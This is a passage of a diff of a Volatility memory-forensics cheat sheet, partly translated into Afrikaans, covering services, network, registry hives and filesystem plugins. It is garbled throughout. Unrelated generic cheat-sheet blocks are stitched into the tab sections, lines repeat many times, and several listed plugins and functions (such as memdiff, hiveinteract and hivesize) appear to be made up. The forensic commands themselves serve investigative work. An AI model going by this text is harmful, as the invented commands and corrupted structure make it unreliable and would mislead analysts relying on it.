alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesinligting in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle handvatsels in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte (VAD). +- `vadtree`: Gee 'n boomstruktuur van alle VAD's in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke VAD. +- `vadwalk`: Loop deur alle VAD's in die geheue-dump en gee inligting oor elkeen. +- `vadtree`: Gee 'n boomstruktuur van alle VAD's in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke VAD. +- `vadwalk`: Loop deur alle VAD's in die geheue-dump en gee inligting oor elkeen. + +### Geheue-analise Opdragte + +- `memmap`: Gee 'n lys van alle geheue-kaarte in die geheue-dump. +- `memdump`: Dump die inhoud van 'n spesifieke geheue-kaart. +- `memstrings`: Soek na ASCII- en Unicode-strings in die geheue-dump. +- `memscan`: Skandeer vir 'n spesifieke waarde in die geheue-dump. +- `memdiff`: Vergelyk twee geheue-dumps en identifiseer verskille. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. + +### Gebruikersruimte Opdragte + +- `cmdscan`: Skandeer vir uitgevoerde opdragte in die geheue-dump. +- `consoles`: Lys alle oop konsole-sessies in die geheue-dump. +- `cmdline`: Gee die opdraglyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `envars`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `getsids`: Gee die sekuriteitsidentifikasienommers (SIDs) vir alle prosesse in die geheue-dump. +- `privs`: Lys die privilegiese van alle prosesse in die geheue-dump. +- `printkey`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. +- `printkey`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. +- `printkey`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. + +### Kernelruimte Opdragte + +- `modules`: Lys alle gelaai kernel modules in die geheue-dump. +- `modscan`: Skandeer vir kernel modules in die geheue-dump. +- `moddump`: Dump die inhoud van 'n spesifieke kernel module. +- `ssdt`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverscan`: Skandeer vir gelaai kernel drivers in die geheue-dump. +- `driverirp`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. +- `driverirp`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. +- `driverirp`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. + +### Netwerk Opdragte + +- `connections`: Lys alle aktiewe netwerkverbindings in die geheue-dump. +- `sockets`: Lys alle aktiewe sokkels in die geheue-dump. +- `sockscan`: Skandeer vir sokkelinligting in die geheue-dump. +- `netscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `connscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `connscan`: Skandeer vir netwerkverbindings in die geheue-dump. +- `connscan`: Skandeer vir netwerkverbindings in die geheue-dump. + +### Ander Opdragte + +- `idt`: Gee die Interrupt Descriptor Table (IDT) in die geheue-dump. +- `gdt`: Gee die Global Descriptor Table (GDT) in die geheue-dump. +- `dt`: Gee die Descriptor Table (DT) in die geheue-dump. +- `ssdt`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. +- `callbacks`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common: list_tasks()`: Gee 'n lys van alle aktiewe prosesse in die geheue-dump. +- `volatility.plugins.common: list_modules()`: Gee 'n lys van alle gelaai DLL's in die geheue-dump. +- `volatility.plugins.common: list_handles()`: Gee 'n lys van alle handvatsels in die geheue-dump. +- `volatility.plugins.common: list_drivers()`: Gee 'n lys van alle gelaai kernel drivers in die geheue-dump. +- `volatility.plugins.common: list_connections()`: Gee 'n lys van alle aktiewe netwerkverbindings in die geheue-dump. + +### Geheue-analise Funksies + +- `volatility.plugins.memmap: get_memmap()`: Gee 'n lys van alle geheue-kaarte in die geheue-dump. +- `volatility.plugins.memdump: dump_mem()`: Dump die inhoud van 'n spesifieke geheue-kaart. +- `volatility.plugins.memstrings: search_mem()`: Soek na ASCII- en Unicode-strings in die geheue-dump. +- `volatility.plugins.memscan: scan_mem()`: Skandeer vir 'n spesifieke waarde in die geheue-dump. +- `volatility.plugins.memdiff: diff_mem()`: Vergelyk twee geheue-dumps en identifiseer verskille. +- `volatility.plugins.malfind: find_malware()`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. + +### Gebruikersruimte Funksies + +- `volatility.plugins.cmdscan: scan_cmd()`: Skandeer vir uitgevoerde opdragte in die geheue-dump. +- `volatility.plugins.consoles: list_consoles()`: Lys alle oop konsole-sessies in die geheue-dump. +- `volatility.plugins.cmdline: get_cmdline()`: Gee die opdraglyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `volatility.plugins.envars: list_envars()`: Lys alle omgewingsveranderlikes in die geheue-dump. +- `volatility.plugins.getsids: get_sids()`: Gee die sekuriteitsidentifikasienommers (SIDs) vir alle prosesse in die geheue-dump. +- `volatility.plugins.privs: list_privs()`: Lys die privilegiese van alle prosesse in die geheue-dump. +- `volatility.plugins.printkey: print_key()`: Gee die inhoud van 'n spesifieke register sleutel in die geheue-dump. + +### Kernelruimte Funksies + +- `volatility.plugins.modules: list_modules()`: Lys alle gelaai kernel modules in die geheue-dump. +- `volatility.plugins.modscan: scan_modules()`: Skandeer vir kernel modules in die geheue-dump. +- `volatility.plugins.moddump: dump_module()`: Dump die inhoud van 'n spesifieke kernel module. +- `volatility.plugins.ssdt: get_ssdt()`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `volatility.plugins.driverscan: scan_drivers()`: Skandeer vir gelaai kernel drivers in die geheue-dump. +- `volatility.plugins.driverirp: get_irp()`: Gee die IRP-handvatsels vir 'n spesifieke kernel driver in die geheue-dump. + +### Netwerk Funksies + +- `volatility.plugins.connections: list_connections()`: Lys alle aktiewe netwerkverbindings in die geheue-dump. +- `volatility.plugins.sockets: list_sockets()`: Lys alle aktiewe sokkels in die geheue-dump. +- `volatility.plugins.sockscan: scan_sockets()`: Skandeer vir sokkelinligting in die geheue-dump. +- `volatility.plugins.netscan: scan_network()`: Skandeer vir netwerkverbindings in die geheue-dump. + +### Ander Funksies + +- `volatility.plugins.idt: get_idt()`: Gee die Interrupt Descriptor Table (IDT) in die geheue-dump. +- `volatility.plugins.gdt: get_gdt()`: Gee die Global Descriptor Table (GDT) in die geheue-dump. +- `volatility.plugins.dt: get_dt()`: Gee die Descriptor Table (DT) in die geheue-dump. +- `volatility.plugins.ssdt: get_ssdt()`: Gee die System Service Descriptor Table (SSDT) in die geheue-dump. +- `volatility.plugins.callbacks: list_callbacks()`: Lys alle geregistreerde terugroepfunksies in die geheue-dump. ``` volatility --profile=Win7SP1x86_23418 -f file.dmp userassist ``` @@ -417,11 +1314,11 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist
-​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +​​​​[**RootedCON**](https://www.rootedcon.com/) is die mees relevante sibersekuriteit geleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} -## Services +## Dienste {% tabs %} {% tab title="vol3" %} @@ -429,19 +1326,74 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist ./vol.py -f file.dmp windows.svcscan.SvcScan #List services ./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerder-objekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. + +### Gevorderde Opdragte + +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `modscan`: Skandeer die geheue-dump vir gegewe modulepatrone. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverirp`: Gee inligting oor die IRP-handlers van bestuurders in die geheue-dump. +- `devicetree`: Gee 'n boomstruktuur van die toestelboom in die geheue-dump. +- `privs`: Lys alle toegangsregte van prosesse in die geheue-dump. +- `envars`: Gee die omgewingsveranderlikes van prosesse in die geheue-dump. +- `cmdscan`: Skandeer die geheue-dump vir gegewe opdraglyne. +- `consoles`: Lys alle konsolvensters in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basis-klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basis-klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basis-klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basis-klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basis-klas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basis-klas vir BSD-opdragte. +- `volatility.plugins.common.AbstractNetCommand`: Die basis-klas vir netwerk-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.windows.registry.hivelist.HiveList`: Lys alle gelaai hive-lêers in die geheue-dump. +- `volatility.plugins.windows.registry.printkey.PrintKey`: Druk die inhoud van 'n Windows-registersleutel. +- `volatility.plugins.windows.registry.printval.PrintVal`: Druk die waarde van 'n Windows-registersleutel. +- `volatility.plugins.windows.registry.hivedump.HiveDump`: Stoor die inhoud van 'n hive-lêer in 'n lêer. +- `volatility.plugins.windows.registry.hiveexport.HiveExport`: Voer die inhoud van 'n hive-lêer uit na 'n REG-lêer. +- `volatility.plugins.windows.registry.hivefind.HiveFind`: Vind alle hive-lêers wat 'n gegewe waarde bevat. +- `volatility.plugins.windows.registry.hiveinteract.HiveInteract`: Interageer met 'n hive-lêer deur sleutels en waardes te skep, wysig en verwyder. +- `volatility.plugins.windows.registry.hiveparse.HiveParse`: Analiseer die inhoud van 'n hive-lêer en gee 'n gestruktureerde uitset. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Dokumentasie](https://volatility.readthedocs.io/en/latest/) ```bash #Get services and binary path volatility --profile=Win7SP1x86_23418 svcscan -f file.dmp #Get name of the services and SID (slow) volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp ``` -{% endtab %} -{% endtabs %} - -## Network +## Netwerk {% tabs %} {% tab title="vol3" %} @@ -449,13 +1401,84 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp ./vol.py -f file.dmp windows.netscan.NetScan #For network info of linux use volatility2 ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. +4. Extract the downloaded archive to a directory of your choice. +5. Navigate to the extracted directory and run Volatility using the command `python vol.py`. + +## Basic Usage + +To analyze a memory dump with Volatility, use the following command: + +``` +python vol.py -f [options] +``` + +Replace `` with the path to the memory dump file and `` with the name of the Volatility plugin you want to use. You can specify additional options to customize the analysis. + +## Process Analysis + +To analyze processes in a memory dump, use the `pslist` plugin. This plugin lists all running processes and their details, such as process ID, parent process ID, and command line arguments. + +``` +python vol.py -f pslist +``` + +To filter the output based on a specific process name, use the `--name` option followed by the process name. + +``` +python vol.py -f pslist --name +``` + +## Network Analysis + +To analyze network connections in a memory dump, use the `netscan` plugin. This plugin displays information about open network connections, such as local and remote IP addresses, ports, and process IDs. + +``` +python vol.py -f netscan +``` + +To filter the output based on a specific IP address or port, use the `--ip` or `--port` option followed by the IP address or port number. + +``` +python vol.py -f netscan --ip +python vol.py -f netscan --port +``` + +## File Analysis + +To analyze files in a memory dump, use the `filescan` plugin. This plugin scans the memory dump for file artifacts, such as file handles, file names, and file paths. + +``` +python vol.py -f filescan +``` + +To extract a specific file from the memory dump, use the `dumpfiles` plugin followed by the file path. + +``` +python vol.py -f dumpfiles --dump-dir --name +``` + +## Conclusion + +This cheatsheet provides a basic overview of Volatility and its usage for memory analysis. It covers some of the most commonly used plugins and their options. For more advanced analysis techniques and plugins, refer to the official Volatility documentation and community resources. ```bash volatility --profile=Win7SP1x86_23418 netscan -f file.dmp volatility --profile=Win7SP1x86_23418 connections -f file.dmp#XP and 2003 only -volatility --profile=Win7SP1x86_23418 connscan -f file.dmp#TCP connections +volatility --profile=Win7SP1x86_23418 connscan -f file.dmp#TCP connections volatility --profile=Win7SP1x86_23418 sockscan -f file.dmp#Open sockets volatility --profile=Win7SP1x86_23418 sockets -f file.dmp#Scanner for tcp socket objects @@ -469,9 +1492,9 @@ volatility --profile=SomeLinux -f file.dmp linux_route_cache {% endtab %} {% endtabs %} -## Registry hive +## Registerhuis -### Print available hives +### Druk beskikbare registerhuise af {% tabs %} {% tab title="vol3" %} @@ -479,9 +1502,123 @@ volatility --profile=SomeLinux -f file.dmp linux_route_cache ./vol.py -f file.dmp windows.registry.hivelist.HiveList #List roots ./vol.py -f file.dmp windows.registry.printkey.PrintKey #List roots and get initial subkeys ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility Framework vir geheue-dump-analise. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Identifiseer die profiel van die geheue-dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Vertoon 'n boomstruktuur van alle aktiewe prosesse in die geheue-dump. +- `psscan`: Skandeer vir prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's vir 'n spesifieke proses in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer vir lêers in die geheue-dump. +- `cmdline`: Vertoon die bevellyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +### Geheue-analise Opdragte + +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. +- `malfind`: Identifiseer verdagte kode in die geheue-dump. + +### Geheue-analise Funksies + +- `volshell`: Voer 'n interaktiewe skulpry uit binne die geheue-dump. +- `vadwalk`: Loop deur alle virtuele adresruimtes in die geheue-dump. +- `vaddump`: Dump die inhoud van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. +- `vadinfo`: Gee inligting oor 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Vertoon 'n boomstruktuur van alle virtuele adresruimtes in die geheue-dump. + +## Volatility Profiele + +- `WinXPSP2x86`: Windows XP SP2 x86 +- `WinXPSP3x86`: Windows XP SP3 x86 +- `Win7SP0x86`: Windows 7 SP0 x86 +- `Win7SP1x86`: Windows 7 SP1 x86 +- `Win7SP0x64`: Windows 7 SP0 x64 +- `Win7SP1x64`: Windows 7 SP1 x64 +- `Win2003SP0x86`: Windows 2003 SP0 x86 +- `Win2003SP1x86`: Windows 2003 SP1 x86 +- `Win2003SP2x86`: Windows 2003 SP2 x86 +- `Win2003SP0x64`: Windows 2003 SP0 x64 +- `Win2003SP1x64`: Windows 2003 SP1 x64 +- `Win2003SP2x64`: Windows 2003 SP2 x64 +- `Win2008SP1x86`: Windows 2008 SP1 x86 +- `Win2008SP1x64`: Windows 2008 SP1 x64 +- `Win2008SP2x86`: Windows 2008 SP2 x86 +- `Win2008SP2x64`: Windows 2008 SP2 x64 +- `WinVistaSP0x86`: Windows Vista SP0 x86 +- `WinVistaSP1x86`: Windows Vista SP1 x86 +- `WinVistaSP2x86`: Windows Vista SP2 x86 +- `WinVistaSP0x64`: Windows Vista SP0 x64 +- `WinVistaSP1x64`: Windows Vista SP1 x64 +- `WinVistaSP2x64`: Windows Vista SP2 x64 +- `Win2012R2x64`: Windows 2012 R2 x64 +- `Win8SP0x86`: Windows 8 SP0 x86 +- `Win8SP0x64`: Windows 8 SP0 x64 +- `Win81U1x86`: Windows 8.1 U1 x86 +- `Win81U1x64`: Windows 8.1 U1 x64 +- `Win10x86`: Windows 10 x86 +- `Win10x64`: Windows 10 x64 + +## Volatility Installasie + +Volg hierdie stappe om Volatility Framework op Linux te installeer: + +1. Installeer die vereiste afhanklikhede: + +```bash +sudo apt-get install python2.7 python-pip +sudo pip install distorm3 +``` + +2. Kloon die Volatility Framework-repo: + +```bash +git clone https://github.com/volatilityfoundation/volatility.git +``` + +3. Navigeer na die Volatility Framework-repo: + +```bash +cd volatility +``` + +4. Voer die installasieskrip uit: + +```bash +sudo python setup.py install +``` + +## Volatility Gebruik + +Om Volatility Framework te gebruik, voer die volgende opdrag in: + +```bash +volatility -f +``` + +Vervang `` met die pad na die geheue-dumplêer en `` met die spesifieke opdrag wat jy wil uitvoer. + +## Bronne + +- [Volatility Framework GitHub-repo](https://github.com/volatilityfoundation/volatility) +- [Volatility Framework Dokumentasie](https://github.com/volatilityfoundation/volatility/wiki) +- [Volatility Framework Profiele](https://github.com/volatilityfoundation/profiles) ```bash volatility --profile=Win7SP1x86_23418 -f file.dmp hivelist #List roots volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get initial subkeys @@ -489,16 +1626,84 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp printkey #List roots and get i {% endtab %} {% endtabs %} -### Get a value +### Kry 'n waarde {% tabs %} {% tab title="vol3" %} ```bash ./vol.py -f file.dmp windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows NT\CurrentVersion" ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tyd van die dump. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerder-objekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyn-argumente vir 'n spesifieke proses in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimte van 'n spesifieke proses in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimte van 'n spesifieke proses in die geheue-dump. + +### Gevorderde Opdragte + +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. +- `ldrmodules`: Lys alle gelaai modules in die geheue-dump. +- `modscan`: Skandeer die geheue-dump vir gegewe modulepatrone. +- `ssdt`: Gee inligting oor die System Service Descriptor Table (SSDT) in die geheue-dump. +- `driverscan`: Skandeer die geheue-dump vir gegewe bestuurderpatrone. +- `mutantscan`: Skandeer die geheue-dump vir gegewe mutantpatrone. +- `yarascan`: Voer 'n YARA-handtekening-skandering uit op die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basiese klas vir Windows-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basiese klas vir Linux-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basiese klas vir Mac-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basiese klas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basiese klas vir iOS-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.malware.malfind.Malfind`: Identifiseer moontlike kwaadwillige prosesse. +- `volatility.plugins.malware.apihooks.ApiHooks`: Identifiseer API-hake. +- `volatility.plugins.malware.ldrmodules.LdrModules`: Lys alle gelaai modules. +- `volatility.plugins.malware.modscan.ModScan`: Skandeer vir gegewe modulepatrone. +- `volatility.plugins.malware.ssdt.SSDT`: Gee inligting oor die SSDT. +- `volatility.plugins.malware.driverscan.DriverScan`: Skandeer vir gegewe bestuurderpatrone. +- `volatility.plugins.malware.mutantscan.MutantScan`: Skandeer vir gegewe mutantpatrone. +- `volatility.plugins.malware.yarascan.YaraScan`: Voer 'n YARA-handtekening-skandering uit. + +## Volatility Instellings + +- `--profile=PROFILE`: Spesifiseer die profiel van die geheue-dump. +- `--location=LOCATION`: Spesifiseer die pad na die geheue-dump. +- `--output=OUTPUT`: Spesifiseer die uitvoerformaat (bv. csv, json, sqlite). +- `--output-file=OUTPUT_FILE`: Spesifiseer die uitvoerlêer. +- `--plugins=PLUGINS`: Spesifiseer die plugins wat gebruik moet word. +- `--help`: Gee hulpinligting oor die opdrag. + +## Volatility Voorbeelde + +- `vol.py -f memory.dmp imageinfo`: Gee inligting oor die geheue-dump. +- `vol.py -f memory.dmp pslist`: Lys alle aktiewe prosesse. +- `vol.py -f memory.dmp vadinfo -p PID`: Gee inligting oor die virtuele adresruimte van 'n spesifieke proses. +- `vol.py -f memory.dmp malfind`: Identifiseer moontlike kwaadwillige prosesse. +- `vol.py -f memory.dmp yarascan -Y YARA_RULES`: Voer 'n YARA-handtekening-skandering uit. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Documentation](https://github.com/volatilityfoundation/volatility/wiki) ```bash volatility --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows NT\CurrentVersion" -f file.dmp # Get Run binaries registry value @@ -507,27 +1712,80 @@ volatility -f file.dmp --profile=Win7SP1x86 printkey -o 0x9670e9d0 -K 'Software\ {% endtab %} {% endtabs %} -### Dump - +### Storting ```bash #Dump a hive volatility --profile=Win7SP1x86_23418 hivedump -o 0x9aad6148 -f file.dmp #Offset extracted by hivelist #Dump all hives volatility --profile=Win7SP1x86_23418 hivedump -f file.dmp ``` +## Lêersisteem -## Filesystem - -### Mount +### Monteer {% tabs %} {% tab title="vol3" %} ```bash #See vol2 ``` -{% endtab %} +# Volatility Cheat Sheet -{% tab title="vol2" %} +Hierdie spiekbrief bevat 'n lys van algemene opdragte en funksies wat gebruik kan word met Volatility, 'n kragtige raamwerk vir geheue-dump-analise. Hierdie spiekbrief is bedoel as 'n verwysing vir forensiese ondersoekers en beveiligingsanaliste wat Volatility gebruik om inligting uit geheue-dumps te ontleed. + +## Volatility Opdragte + +### Basiese Opdragte + +- `imageinfo`: Gee inligting oor die geheue-dump, soos die besturingstelsel, die argitektuur en die tydskrif. +- `pslist`: Lys alle aktiewe prosesse in die geheue-dump. +- `pstree`: Gee 'n boomstruktuur van alle prosesse in die geheue-dump. +- `dlllist`: Lys alle gelaai DLL's in die geheue-dump. +- `handles`: Lys alle hanteerderobjekte in die geheue-dump. +- `filescan`: Skandeer die geheue-dump vir gegewe lêername of uitbreidings. +- `cmdline`: Gee die opdraglyne van alle prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `malfind`: Identifiseer moontlike kwaadwillige prosesse in die geheue-dump. +- `apihooks`: Identifiseer API-hake in die geheue-dump. + +### Gevorderde Opdragte + +- `memdump`: Skep 'n geheue-dump van 'n spesifieke proses in die geheue-dump. +- `moddump`: Skep 'n geheue-dump van 'n spesifieke gelaai DLL in die geheue-dump. +- `vaddump`: Skep 'n geheue-dump van 'n spesifieke virtuele adresruimte in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadwalk`: Gee 'n gedetailleerde lys van die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadtree`: Gee 'n boomstruktuur van die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadinfo`: Gee inligting oor die virtuele adresruimtes van prosesse in die geheue-dump. +- `vadwalk`: Gee 'n gedetailleerde lys van die virtuele adresruimtes van prosesse in die geheue-dump. + +## Volatility Funksies + +### Basiese Funksies + +- `volatility.plugins.common.AbstractWindowsCommand`: Die basisklas vir Windows-opdragte. +- `volatility.plugins.common.AbstractMacCommand`: Die basisklas vir Mac-opdragte. +- `volatility.plugins.common.AbstractLinuxCommand`: Die basisklas vir Linux-opdragte. +- `volatility.plugins.common.AbstractAndroidCommand`: Die basisklas vir Android-opdragte. +- `volatility.plugins.common.AbstractIOSCommand`: Die basisklas vir iOS-opdragte. +- `volatility.plugins.common.AbstractBSDCommand`: Die basisklas vir BSD-opdragte. + +### Gevorderde Funksies + +- `volatility.plugins.windows.registry.hivelist.HiveList`: Lys alle gelaai hive-lêers in die geheue-dump. +- `volatility.plugins.windows.registry.printkey.PrintKey`: Druk die inhoud van 'n spesifieke sleutel in die Windows-registreerder. +- `volatility.plugins.windows.registry.hivedump.HiveDump`: Skep 'n geheue-dump van 'n spesifieke hive-lêer in die geheue-dump. +- `volatility.plugins.windows.registry.hiveexport.HiveExport`: Voer die inhoud van 'n spesifieke hive-lêer uit na 'n REG-lêer. +- `volatility.plugins.windows.registry.hivefind.HiveFind`: Soek na spesifieke sleutels in die Windows-registreerder. +- `volatility.plugins.windows.registry.hiveprint.HivePrint`: Druk die inhoud van 'n spesifieke hive-lêer in die Windows-registreerder. +- `volatility.plugins.windows.registry.hivescan.HiveScan`: Skandeer die geheue-dump vir hive-lêers. +- `volatility.plugins.windows.registry.hivesize.HiveSize`: Gee die grootte van 'n spesifieke hive-lêer in die geheue-dump. + +## Bronne + +- [Volatility GitHub Repository](https://github.com/volatilityfoundation/volatility) +- [Volatility Dokumentasie](https://volatility.readthedocs.io/en/latest/) ```bash volatility --profile=SomeLinux -f file.dmp linux_mount volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the entire filesystem (if possible) @@ -535,7 +1793,7 @@ volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the en {% endtab %} {% endtabs %} -### Scan/dump +### Skandeer/dump {% tabs %} {% tab title="vol3" %} @@ -543,9 +1801,80 @@ volatility --profile=SomeLinux -f file.dmp linux_recover_filesystem #Dump the en ./vol.py -f file.dmp windows.filescan.FileScan #Scan for files inside the dump ./vol.py -f file.dmp windows.dumpfiles.DumpFiles --physaddr <0xAAAAA> #Offset from previous command ``` -{% endtab %} +# Volatility Cheatsheet -{% tab title="vol2" %} +## Introduction + +Volatility is a powerful open-source memory forensics framework that allows you to extract and analyze information from memory dumps. It supports a wide range of operating systems and can be used to investigate various types of incidents, such as malware infections, data breaches, and system compromises. + +This cheatsheet provides a quick reference guide for using Volatility to perform memory analysis tasks. It includes commands and options for common memory analysis techniques, such as process analysis, network analysis, and file analysis. + +## Installation + +To install Volatility, follow these steps: + +1. Install Python 2.7 or Python 3.x. +2. Install the required Python packages by running `pip install -r requirements.txt`. +3. Download the latest release of Volatility from the official GitHub repository. 